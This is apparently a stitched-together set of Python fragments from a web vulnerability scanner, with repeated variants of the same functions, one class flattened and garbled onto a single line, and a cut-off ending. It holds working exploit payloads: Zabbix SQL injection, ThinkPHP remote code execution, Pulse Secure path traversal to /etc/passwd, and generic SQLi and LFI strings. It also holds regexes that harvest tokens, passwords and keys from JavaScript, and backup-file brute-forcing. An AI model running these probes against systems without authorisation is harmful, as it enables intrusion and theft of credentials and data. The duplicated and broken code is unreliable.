def verify_https(url):
    """Determine whether *url* answers over https or http.

    Strips the input down to a bare host, tries https first (following a
    301/302 to the 'www.' variant), and falls back to http.  Returns the
    working scheme-qualified url, or None if nothing answered.
    """
    req = Requests()
    parsed = parse.urlparse(url)
    if parsed.netloc:
        url = parsed.netloc
    elif parsed.path:
        url = parsed.path
    try:
        r = req.get('https://' + url)
        # req.get returns None on failure; touching r.status_code then
        # raises AttributeError, which the broad except below turns into
        # the plain-http fallback.
        if r.status_code in (301, 302):
            r = req.get('https://' + 'www.' + url)
            if r.status_code == 200:
                return 'https://' + 'www.' + url
        return 'https://' + url
    except Exception:
        try:
            req.get('http://' + url)
            return 'http://' + url
        except Exception:
            pass
def verify_https(url):
    """Probe *url* and return a reachable scheme-qualified url.

    A url that already carries a scheme is tried as-is first; otherwise
    the bare host is extracted, https is attempted, and plain http is the
    fallback.  Returns None when nothing answered.
    """
    req = Requests()
    if '://' in url:
        try:
            req.get(url)
            return url
        except Exception:
            pass
    host = parse_host(url)
    parsed = parse.urlparse(url)
    if parsed.netloc:
        url = parsed.netloc
    elif parsed.path:
        url = parsed.path
    try:
        r = req.get('https://' + url)
        # req.get returns None on failure; touching status_code raises
        # AttributeError, which is the signal to retry over plain http.
        getattr(r, 'status_code')
        console('Verify', host, 'https://' + url + '\n')
        return 'https://' + url
    except AttributeError:
        try:
            req.get('http://' + url)
            console('Verify', host, 'http://' + url + '\n')
            return 'http://' + url
        except Exception:
            pass
    except Exception as e:
        logging.exception(e)
def checkwaf(url):
    """Fingerprint a WAF in front of *url*.

    Checks the plain response first; if that looks clean, replays each
    attack payload and re-fingerprints.  Any network/parse failure is
    treated as 'NoWAF' (best-effort probe).
    """
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text[:10000])
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text[:10000])
        return result
    except Exception:
        # narrowed from a bare 'except:' so Ctrl-C still propagates
        return 'NoWAF'
def verify_https(url):
    """Return 'https://<host>' if the host answers over https, else
    'http://<host>' if it answers over http, else None."""
    req = Requests()
    parsed = parse.urlparse(url)
    if parsed.netloc:
        url = parsed.netloc
    elif parsed.path:
        url = parsed.path
    try:
        req.get('https://' + url)
        return 'https://' + url
    except Exception:
        try:
            req.get('http://' + url)
            return 'http://' + url
        except Exception:
            pass
class JsLeaks():
    """Fetch javascript files and grep them for leaked urls, emails,
    credentials, cloud buckets, IPs, phone numbers and domains."""

    def __init__(self):
        self.result = []
        self.req = Requests()

    def pool(self, urls):
        """Scan *urls* concurrently and return the accumulated findings."""
        try:
            with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
                futures = {executor.submit(self.get_js, i): i for i in urls}
                for future in concurrent.futures.as_completed(futures, timeout=3):
                    future.result()
        except (EOFError, concurrent.futures._base.TimeoutError):
            pass
        except Exception as e:
            logging.exception(e)
        return self.result

    def verify(self, text):
        """Return True only when every entry in *text* matches the
        noise pattern (local IPs, google, image names)."""
        result = True
        for i in text:
            if not re.search(r'^0\d\.\d+\.\d+\.\d+|google|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i):
                result = False
                break
        return result

    def get_js(self, url):
        """Download *url* and run every leak regex over its first 100 KB."""
        r = self.req.get(url)
        regex = (
            # urls
            r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b',
            r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))',
            # emails
            r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
            # leaked tokens / passwords, e.g. token = xxxxxxxx, "apikey" : "xssss"
            r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}',
            # md5 hashes
            r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)',
            # paths like "/task/router"
            r'"(/\w{3,}/\w{3,})"',
            # IP addresses
            r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
            # cloud-storage leaks
            r'[\w]+\.cloudfront\.net',
            r'[\w\-.]+\.appspot\.com',
            r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
            r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
            r'(storage\.cloud\.google\.com\/[\w\-.]+)',
            r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
            # phone numbers
            # BUG FIX: a missing trailing comma here used to concatenate the
            # phone pattern with the domain pattern into one broken regex,
            # so neither pattern ever matched anything.
            r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
            # domains
            r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))'
        )
        for pattern in regex:
            text = re.findall(pattern, r.text[:100000], re.M | re.I)
            # findall always returns a list, so testing truthiness is enough
            if text and self.verify(text):
                self.result.extend(url + ' Leaks: ' + x for x in text)
def get_info(url):
    """Check for an exposed Apache Solr admin console at <url>/solr/."""
    try:
        req = Requests()
        url = url + '/solr/'
        r = req.get(url)
        # '==' rather than 'is': identity comparison against an int literal
        # only works by accident of CPython's small-int cache.
        if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
            return 'Apache Solr Admin leask: ' + url
    except Exception:
        pass
def check(url, ip, ports, apps):
    """CVE-2016-10134: Zabbix jsrpc.php 'profileIdx2' error-based SQL
    injection probe.  Looks for md5(0x11) leaking into the response."""
    req = Requests()
    if verify(vuln, ports, apps):
        # BUG FIX: the original payload contained 'screen.get×tamp=' — the
        # '&times' of '&timestamp' had been mangled into the '×' HTML
        # entity; restored to the documented CVE payload.
        payload = (r"/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083"
                   r"&pageFile=history.php&profileIdx=web.item.graph"
                   r"&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23"
                   r"&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17")
        try:
            r = req.get(url + payload)
            if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text):
                return 'CVE-2016-10134 zabbix sqli:' + url
        except Exception:
            pass
def check(url, ip, ports, apps):
    """ThinkPHP 5.x invokefunction remote code execution probe
    (calls phpinfo() and looks for its banner in the response)."""
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
    try:
        rsp = req.get(url + payload)
        if 'PHP Version' in rsp.text or 'PHP Extension Build' in rsp.text:
            return 'thinkphp5_rce_1 | ' + url
    except Exception:
        pass
def check(url, ip, ports, apps):
    """CVE-2019-11510: Pulse Connect Secure arbitrary file read probe
    (path traversal to /etc/passwd)."""
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
    try:
        rsp = req.get(url + payload)
        if 'root:x:0:0:root' in rsp.text:
            return 'CVE-2019-11510 Pulse Connect Secure File | ' + url
    except Exception:
        pass
def check(url, ip, ports, apps):
    """Check for an exposed Apache Solr admin console."""
    req = Requests()
    if verify(vuln, ports, apps):
        try:
            url = url + '/solr/'
            r = req.get(url)
            # Two fixes: '==' instead of 'is' for the int comparison, and
            # search r.text — 'str in r.content' raised TypeError (str
            # needle in a bytes haystack), so this check could never match.
            if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
                return 'Apache Solr Admin leask'
        except Exception:
            pass
def get_info(url):
    """Probe candidate paths for an exposed phpinfo() page."""
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if '<title>phpinfo()' in r.text or 'php_version' in r.text:
                    return 'phpinfo leaks: ' + url + i
    except Exception:
        # narrowed from a bare 'except:' — best-effort probe, but let
        # KeyboardInterrupt/SystemExit propagate
        pass
def get_info(url):
    """Probe candidate paths for plain-text information leaks
    (non-html, non-json responses that pass the verify() filter)."""
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200 and '<html>' not in r.text:
                # skip json-looking bodies
                if not re.search(r'{"\w+":', r.text):
                    if verify(r.text):
                        return 'leaks : ' + url + i
    except Exception:
        # narrowed from a bare 'except:'
        pass
def check(url, ip, ports, apps):
    """Django < 2.0.8 open-redirect probe: '//www.example.com' should not
    be reflected in the Location header of a redirect."""
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    try:
        rsp = req.get(url + "//www.example.com")
        location = rsp.headers.get('Location')
        if rsp.is_redirect and 'www.example.com' in location:
            return 'Django < 2.0.8 任意URL跳转漏洞'
    except Exception:
        pass
def get_info(url):
    """Probe candidate paths for plain-text leaks, skipping anything that
    looks like html, json or an nginx status page."""
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200 and '<html' not in r.text:
                if not re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text):
                    if verify(r.text):
                        return 'leaks : ' + url + i
    except Exception:
        # narrowed from a bare 'except:'
        pass
def checkwaf(url):
    """Detect a WAF in front of *url*.

    Fingerprints the plain response first; if that looks clean, replays
    each attack payload and returns the first non-'NoWAF' fingerprint.
    Falls back to a CDN check when nothing matched.
    """
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text[:10000])
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text[:10000])
                if result != 'NoWAF':
                    # first payload that triggers a WAF signature wins
                    return result
    except UnboundLocalError:
        pass
    except Exception as e:
        logging.exception(e)
    host = parse_host(url)
    # NOTE(review): 'CDN IP' is returned when iscdn() is falsy — confirm
    # iscdn()'s return semantics (it appears to mean "is a real, scannable
    # IP" elsewhere in this file).
    if not iscdn(host):
        return 'CDN IP'
    return 'NoWAF'
class SqlLfi(): def __init__(self): self.result = [] self.req = Requests() def sqli(self, qurl): payload = { "'", "%2527", "')", " AnD 7738=8291" } LFI_payload = {'../../../../etc/passwd|root:x', '../../../../etc/group|root:x', 'random.php|Failed opening', 'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='******'{} SQLi:{}'.format(dbms, qurl) self.result.append(result) raise Getoutofloop for i in LFI_payload: url = '' lfi, pattern = i.split('|') if re.search(r'=\w+\.\w{3}$', qurl): url = re.sub(r'\w+\.\w{3}$', lfi, qurl) elif re.search('=\w+', qurl): url = re.sub(r'\w+$', lfi, qurl) r = self.req.get(url) if re.search(pattern, r.text, re.S): self.result.append('LFI: {}'.format(url)) break except: pass def pool(self, urls): host = dedup_url(urls) with concurrent.futures.ThreadPoolExecutor( max_workers=30) as executor: executor.map(self.sqli, host) return self.result
def robots(url):
    """Fetch <url>/robots.txt and return its unique path entries.

    Returns None when the file is missing, html, or empty of paths.
    """
    try:
        req = Requests()
        rsp = req.get(url + '/robots.txt')
        if rsp.status_code == 200 and '<html' not in rsp.text:
            paths = re.findall(r"/[\w\?\.=/]+/?", rsp.text)
            if paths:
                return list(set(paths))
    except (UnboundLocalError, AttributeError):
        pass
    except Exception as e:
        logging.exception(e)
def checkwaf(url):
    """Detect a WAF in front of *url*; returns the WAF fingerprint,
    'NoWAF', or 'CDN IP' when the host is behind a CDN."""
    result = 'NoWAF'
    host = parse_host(url)
    if not iscdn(host):
        return 'CDN IP'
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text)
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text)
                if result != 'NoWAF':
                    return result
        else:
            return result
    except (UnboundLocalError, AttributeError):
        pass
    except Exception as e:
        logging.exception(e)
    # BUG FIX: previously fell off the end and returned None when every
    # payload probe came back clean; report the last result explicitly.
    return result
def get_info(url):
    """Probe candidate paths for admin/login pages (200 with login-ish
    markers, or a bare 403)."""
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if re.search(
                        r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd',
                        r.text, re.S):
                    if verify(r.text):
                        return 'Admin_Page : ' + url + i
            elif r.status_code == 403:
                return 'May be the login page : ' + url + i
    except Exception:
        # narrowed from a bare 'except:'
        pass
def ipinfo(host):
    """Query viewdns.info's IP history for a domain name.

    Returns the historical IPs that pass the iscdn() filter; an empty
    list for IP inputs or on any lookup failure.
    """
    out = []
    if not re.search(r'\d+\.\d+\.\d+\.\d+', host):
        req = Requests()
        try:
            r = req.get('https://viewdns.info/iphistory/?domain={}'.format(host))
            result = re.findall(
                r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)',
                r.text, re.S | re.I)
            # iterating an empty findall result is a no-op, so the old
            # 'if result:' guard was redundant
            for i in result:
                if iscdn(i):
                    out.append(i)
        except Exception:
            # narrowed from a bare 'except:'
            pass
    return out
def web_info(url):
    """Collect host intelligence: geo address, WAF, fingerprint/title/
    server from the landing page, and OS guess.

    Returns (data_dict, apps, title); the dict is keyed by host name.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    # noinspection PyBroadException
    try:
        r = req.get(url)
        # sniff the charset before handing the body to the fingerprinter
        coding = chardet.detect(r.content).get('encoding')
        r.encoding = coding
        webinfo = WebPage(r.url, r.text, r.headers).info()
    except Exception as e:
        logging.exception(e)
        webinfo = {}
    if webinfo:
        console('Webinfo', host, 'title: {}\n'.format(webinfo.get('title')))
        console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps')))
        console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
    else:
        webinfo = {}
        wafresult = 'None'
    # NOTE(review): OS detection only when iscdn() is truthy — confirm
    # iscdn() means "not behind a CDN" here.
    if iscdn(host):
        osname = osdetect(host)
    else:
        osname = None
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    return data, webinfo.get('apps'), webinfo.get('title')
def web_info(url):
    """Collect host intelligence plus passive DNS and reverse-IP data.

    Returns (data_dict, apps); the dict is keyed by host name.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    try:
        r = req.get(url)
        # sniff the charset before handing the body to the fingerprinter
        coding = chardet.detect(r.content).get('encoding')
        r.encoding = coding
        webinfo = WebPage(r.url, r.text, r.headers).info()
    except Exception as e:
        # best-effort: any fetch/parse failure just yields empty info
        webinfo = {}
    if webinfo:
        console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title')))
        console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps')))
        console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
    else:
        webinfo = {}
        wafresult = 'None'
    if iscdn(host):
        osname = osdetect(host)
    else:
        osname = None
    # enrich with passive DNS and reverse-IP neighbours
    pdns = virustotal(host)
    reverseip = reverse_domain(host)
    webinfo.update({"pdns": pdns})
    webinfo.update({"reverseip": reverseip})
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    return data, webinfo.get('apps')
class crawl():
    """Light crawler: collects same-host dynamic links, first-party js
    files, and email/phone leaks, then feeds them to the js-leak and
    sqli/lfi scanners."""

    def __init__(self, host):
        self.links = []
        self.urls = []
        self.js = []
        self.host = host
        self.result = []
        self.req = Requests()

    def jsparse(self, r):
        # Collect first-party <script src=...> urls, skipping common libs.
        doc = etree.HTML(r.text)
        for src in doc.xpath('//script/@src'):
            if not re.search('jquery|bootstrap|adsbygoogle|javascript|#|vue|react|51.la', src):
                if '://' not in src:
                    src = self.host + src
                self.js.append(src)

    def extr(self, body):
        # BUG FIX: re.search() returns None when there is no match; the
        # original called .group() unconditionally and raised
        # AttributeError on pages without an email/phone.
        email = re.search(
            r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body)
        if email:
            self.result.append('Email Leaks: {}'.format(email.group()))
        phone = re.search(
            r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
            body)
        if phone:
            self.result.append('Phone Leaks: {}'.format(phone.group()))

    def parse_html(self, host):
        """Fetch *host*, harvest js/leaks, and sort its links into
        parameterized (self.links) and plain (self.urls) buckets."""
        try:
            exts = ['asp', 'php', 'jsp', 'do', 'aspx', 'action', 'html']
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.text)
            tmp = html.document_fromstring(r.text)
            tmp.make_links_absolute(self.host)
            for item in tmp.iterlinks():
                link = item[2]
                ext = parse.urlparse(link)[2].split('.')[-1]
                if ext in exts:
                    # parameterized urls go straight to the sqli candidate
                    # list; plain urls are queued for a second visit
                    if re.search('=', link) or re.search(r'/\?\w+=\w+', link):
                        self.links.append(link)
                    else:
                        self.urls.append(link)
        except Exception:
            pass
        return list(set(self.urls))

    def pool(self):
        """Crawl the start page, then its discovered urls concurrently,
        and run the js-leak and sqli/lfi scanners on the findings."""
        result = self.parse_html(self.host)
        with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
            executor.map(self.parse_html, result)
        jslink = JsLeaks().pool(self.js)
        sql = SqlLfi().pool(self.links)
        self.result.extend(jslink)
        self.result.extend(sql)
        return self.result
class crawl():
    """Crawler: walks same-domain <a> links, harvesting first-party js
    files, emails, phone numbers and data hidden in html comments."""

    def __init__(self, host):
        self.links = []      # parameterized (dynamic) urls
        self.urls = []       # plain urls queued for a second visit
        self.js = []         # first-party javascript urls
        self.domain = ''     # netloc of the first page crawled
        self.host = host
        self.result = []
        self.req = Requests()

    def jsparse(self, r):
        """Collect <script src=...> urls, skipping well-known libraries."""
        try:
            html = etree.HTML(r.text)
            result = html.xpath('//script/@src')
            for i in result:
                if not re.search(
                        r'jquery|bootstrap|adsbygoogle|javascript|#|vue|react|51.la/=',
                        i):
                    if '://' not in i:
                        # make relative src absolute against self.host
                        i = re.sub(r'^/|^\.\./', '', i)
                        i = self.host + '/' + i
                    self.js.append(i)
        # NOTE(review): AttributeError is listed twice — one entry was
        # probably meant to be a different exception type.
        except (AttributeError, AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)

    def dedup_url(self, urls):
        """Keep one url per second-to-last path segment to avoid
        re-visiting near-identical pages."""
        urls = list(set(urls))
        result = []
        okurl = []
        for i in urls:
            urlparse = parse.urlparse(i)
            path = urlparse.path
            if path and path.split('/')[-2]:
                key = path.split('/')[-2]
                if key not in result:
                    result.append(key)
                    okurl.append(i)
            else:
                okurl.append(i)
        return okurl

    def extr(self, url, body):
        """Extract emails, phone numbers, and IPs/links hidden inside
        html comments from *body*."""
        email = re.findall(
            r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body)
        if email:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + ' Email: ' + x, email)))
        phone = re.findall(
            r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b',
            body)
        if phone:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + ' Phone: ' + x, phone)))
        # IP addresses inside html comments
        ipaddr = re.findall(
            r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)',
            body)
        if ipaddr:
            self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr)))
        # absolute links inside html comments
        links = re.findall(
            r'(?<=<!--).*((?:http|https):[\w\./\?=&]+)".*(?=-->)', body)
        if links:
            self.result.extend(list(map(lambda x: 'Links: ' + x, links)))
        # commented-out <a href> targets
        links2 = re.findall(r'(?<=<!--).*a\shref="([\w\.\?=\&/]+)".*(?=-->)',
                            body)
        if links2:
            self.result.extend(list(map(lambda x: 'Links: ' + x, links2)))

    def parse_html(self, host):
        """Fetch *host* and bucket its same-domain <a> links."""
        try:
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.url, r.text)
            urlparse = parse.urlparse(host)
            domain = urlparse.netloc
            if not self.domain:
                self.domain = domain
            html = etree.HTML(r.text)
            result = html.xpath('//a/@href')
            for link in result:
                if not re.search('#|mail*|^/$|javascript', link):
                    if 'http' not in link:
                        if urlparse.netloc:
                            link = urlparse.scheme + '://' + urlparse.netloc + '/' + link
                        else:
                            link = 'http://' + host + '/' + link
                    if domain in link:
                        # parameterized urls go straight to the dynamic
                        # list; plain urls are queued for a second visit
                        if re.search('=', link) or re.search(
                                r'/\?\w+=\w+', link):
                            self.links.append(link)
                        else:
                            self.urls.append(link)
        except (UnboundLocalError, AttributeError):
            pass
        except Exception as e:
            logging.exception(e)
        self.urls = self.dedup_url(self.urls)
        return list(set(self.urls))

    def pool(self):
        """Crawl the start page, fan out over discovered urls, scan the
        collected js, print and persist everything found."""
        result = self.parse_html(self.host)
        with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
            executor.map(self.parse_html, result)
        jslink = JsLeaks().pool(self.js)
        self.result.extend(jslink)
        self.links = dedup_link(self.links)
        self.links = list(map(lambda x: 'Dynamic: ' + x, self.links))
        self.result.extend(self.links)
        self.result = list(set(self.result))
        for i in self.result:
            console('Crawl', self.host, i + '\n')
        Sqldb('result').get_crawl(self.domain, self.result)
class DirScan():
    """Directory brute-forcer: builds a wordlist (static lists, robots.txt,
    app-specific extensions, cartesian backup-name products), records a
    404 baseline, then scans concurrently and persists hits."""

    def __init__(self, dbname, apps, host):
        self.notstr = ''     # parsed link set of the 404 baseline page
        self.apps = apps
        self.notlen = ''     # Content-Length of the 404 baseline
        self.goto = ''       # Location header of the 404 baseline redirect
        self.host = host
        self.title = ''
        self.dbname = dbname
        self.outjson = []
        self.req = Requests()

    def get_urls(self, domain):
        """Assemble the candidate path list for *domain*."""
        wordlist = []
        robot = robots(domain)
        domain = domain.replace('http://', '').replace('https://',
                                                       '').rstrip('/')
        # NOTE(review): domain2/domain3 are computed but never used.
        domain2 = re.sub(r'\.', '_', domain)
        domain3 = domain.strip('www.')
        ext = verify_ext(self.apps)
        ext = list(map(lambda x: '.' + x, ext))
        path = []
        for txt in glob.glob(r'data/path/*.txt'):
            with open(txt, 'r', encoding='utf-8') as f:
                for i in f.readlines():
                    path.append(i.strip())
        # cartesian product: likely backup names x archive extensions
        leaks = Cartesian()
        leaks.add_data([
            '/www', '/1', '/2016', '/2017', '/2018', '/2019', '/wwwroot',
            '/backup', '/index', '/web', '/test', '/tmp', '/default',
            '/temp', '/website', '/upload', '/bin', '/bbs', '/www1',
            '/www2', '/log', '/extra', '/file', '/qq', '/up', '/config',
            '/' + domain, '/userlist', '/dev', '/a', '/123', '/sysadmin',
            '/localhost', '/111', '/access', '/old', '/i', '/vip',
            '/index.php', '/global', '/key', '/webroot', '/out', '/server',
        ])
        leaks.add_data([
            '.tar.gz', '.zip', '.rar', '.sql', '.7z', '.bak', '.tar',
            '.txt', '.tgz', '.swp', '~', '.old', '.tar.bz2', '.data', '.csv'
        ])
        path.extend(leaks.build())
        # cartesian product: common page names x fingerprinted extensions
        index = Cartesian()
        index.add_data([
            '/1', '/l', '/info', '/index', '/admin', '/login', '/qq', '/q',
            '/search', '/install', '/default', '/cmd', '/upload', '/test',
            '/manage', '/loading', '/left', '/zzzz', '/welcome', '/ma',
            '/66'
        ])
        index.add_data(ext)
        path.extend(index.build())
        path.extend(wordlist)
        if robot:
            path.extend(robot)
        return list(set(path))

    def _verify(self, url, code, contype, length, goto, text, title):
        """Heuristic 404 filter: return True when the response looks like
        a real page rather than the recorded not-found baseline."""
        try:
            result = True
            if code in BLOCK_CODE:
                result = False
            if contype in BLOCK_CONTYPE:
                result = False
            if length == self.notlen:
                result = False
            # redirect identical to the 404 baseline redirect
            if goto == self.goto:
                result = False
            # url contained in the redirect target (or vice versa)
            if (url in goto) or (goto in url):
                result = False
            if url.strip('/') == self.goto or url.strip('/') == goto:
                result = False
            for i in PAGE_404:
                if i in text:
                    result = False
                    break
            if title == self.title and title != 'None':
                result = False
            # some 302s carry error/404 keywords in the Location header
            if re.search(r'forbidden|error|404', goto):
                result = False
            # archive/text extension answered with an html content-type
            if re.search(
                    r'\.bak$|\.zip$|\.rar$|\.7z$|\.old$|\.htaccess$|\.csv$|\.txt$|\.sql$|\.tar$|\.tar.gz$',
                    url) and contype == 'html':
                result = False
            return result
        except:
            return False

    def parse_html(self, text):
        """Return every a/img/script src+href in *text* (page signature
        used to compare against the 404 baseline)."""
        result = []
        soup = BeautifulSoup(text, 'html.parser')
        for i in soup.find_all(['a', 'img', 'script']):
            if i.get('src'):
                result.append(i.get('src'))
            if i.get('href'):
                result.append(i.get('href'))
        return result

    def check404(self, url):
        """Request a random page and record the 404 baseline (link set,
        length, redirect target)."""
        key = str(random.random() * 100)
        random_url = base64.b64encode(key.encode('utf-8'))
        url = url + '/' + random_url.decode('utf-8') + '.html'
        try:
            self.notstr = '404page'
            r = self.req.get(url)
            # NOTE(review): status_code is an int, so comparing against the
            # string '200' is always False — the link-set baseline is never
            # recorded; confirm whether '200' should be 200.
            if r.status_code == '200':
                coding = chardet.detect(r.content[:10000]).get('encoding')
                if coding:
                    text = r.content[:20000].decode(coding)
                    self.notstr = self.parse_html(text)
            self.notlen = r.headers.get('Content-Length')
            if not self.notlen:
                self.notlen = len(r.content)
            if r.is_redirect:
                self.goto = r.headers['Location']
        except (requests.exceptions.ConnectTimeout,
                requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
                requests.exceptions.SSLError,
                requests.exceptions.ConnectionError, ssl.SSLError,
                AttributeError, ConnectionRefusedError, socket.timeout,
                urllib3.exceptions.ReadTimeoutError,
                urllib3.exceptions.ProtocolError, OpenSSL.SSL.WantReadError):
            pass
        except UnboundLocalError:
            pass
        except Exception as e:
            logging.exception(e)

    def scan(self, host):
        """Request one candidate url and record it if it passes the
        404 heuristics."""
        try:
            r = self.req.scan(host)
            if r.is_redirect:
                goto = r.headers.get('Location')
            else:
                goto = 'test'
            if r.headers.get('Content-Type'):
                contype = re.sub(r'\w+/', '',
                                 str(r.headers.get('Content-Type')))
                contype = re.sub(r';.*', '', contype)
            else:
                contype = 'None'
            rsp_len = r.headers.get('Content-Length')
            # only html is fully read/decoded; other types read capped
            ishtml = False
            if contype == 'html':
                ishtml = True
                content = r.raw.read()
            else:
                content = r.raw.read(25000)
            if ishtml:
                coding = chardet.detect(content).get('encoding')
                if coding:
                    text = content.decode(coding)
                    title = re.search('(?<=<title>).*(?=</title>)', text)
                else:
                    text = 'Other'
                    title = None
            else:
                text = 'Other'
                title = None
            if not rsp_len:
                rsp_len = len(content)
            urlresult = parse.urlparse(host)
            if self._verify(urlresult.path, r.status_code, contype, rsp_len,
                            goto, text, title):
                result = 0
                if ishtml:
                    # identical link set to the 404 baseline -> reject
                    pagemd5 = self.parse_html(text)
                    if pagemd5 == self.notstr:
                        result = 1
                if result < 0.5:
                    if title is None:
                        title = 'None'
                    else:
                        title = title.group()
                        title = re.sub(r'\n|\t', '', title)
                    console('URLS', urlresult.netloc, urlresult.path + '\n')
                    data = {
                        urlresult.netloc: {
                            "rsp_code": r.status_code,
                            "rsp_len": rsp_len,
                            "title": title,
                            "contype": contype,
                            "url": urlresult.path
                        }
                    }
                    self.outjson.append(data)
            r.close()
        except (requests.exceptions.ConnectTimeout,
                requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
                requests.exceptions.SSLError,
                requests.exceptions.ConnectionError, ssl.SSLError,
                AttributeError, ConnectionRefusedError, socket.timeout,
                urllib3.exceptions.ReadTimeoutError,
